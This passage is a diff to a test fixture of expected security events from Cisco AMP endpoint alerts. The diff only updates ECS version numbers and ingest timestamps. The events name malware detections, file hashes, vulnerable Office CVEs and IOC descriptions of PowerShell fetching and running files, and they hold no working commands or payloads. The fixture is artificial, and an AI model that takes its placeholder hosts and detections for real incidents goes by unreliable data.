Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2329,7 +2329,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2355,7 +2355,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701391536Z", + "ingested": "2021-09-13T18:06:29.783778260Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2414,7 +2414,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2434,7 +2434,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:32:35.701393451Z", + "ingested": "2021-09-13T18:06:29.783780334Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 
Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", "kind": "alert", "start": "2021-01-13T10:37:33.000Z", 
@@ -2580,7 +2580,7 @@ { "@timestamp": "2021-01-13T10:23:35.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2598,7 +2598,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:35.701395327Z", + "ingested": "2021-09-13T18:06:29.783782431Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6508159571352093000", "kind": "alert" @@ -2647,7 +2647,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2667,7 +2667,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701397204Z", + "ingested": "2021-09-13T18:06:29.783788750Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "kind": "alert", "start": "2021-01-13T10:13:13.000Z", @@ -2733,7 +2733,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2753,7 +2753,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701399064Z", + "ingested": "2021-09-13T18:06:29.783790904Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "kind": "alert", "start": "2021-01-13T10:13:08.000Z", @@ -2812,7 +2812,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2832,7 +2832,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701401029Z", + "ingested": "2021-09-13T18:06:29.783793103Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2890,7 +2890,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2910,7 +2910,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701402957Z", + "ingested": "2021-09-13T18:06:29.783795204Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "kind": "alert", "start": "2021-01-12T10:24:47.000Z", @@ -2964,7 +2964,7 @@ { "@timestamp": "2021-01-12T10:15:22.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2982,7 +2982,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:35.701404886Z", + "ingested": "2021-09-13T18:06:29.783797267Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6532910514396201000", "kind": "alert" @@ -3037,7 +3037,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3069,7 +3069,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701406760Z", + "ingested": "2021-09-13T18:06:29.783799355Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", "kind": "alert", "action": "Threat 
Detected", @@ -3126,7 +3126,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3146,7 +3146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701408626Z", + "ingested": "2021-09-13T18:06:29.783801409Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -3210,7 +3210,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3242,7 +3242,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701410523Z", + "ingested": "2021-09-13T18:06:29.783803490Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", "kind": "alert", "action": 
"Threat Detected", @@ -3299,7 +3299,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3319,7 +3319,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701412407Z", + "ingested": "2021-09-13T18:06:29.783805582Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -3377,7 +3377,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3397,7 +3397,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701414261Z", + "ingested": "2021-09-13T18:06:29.783807646Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
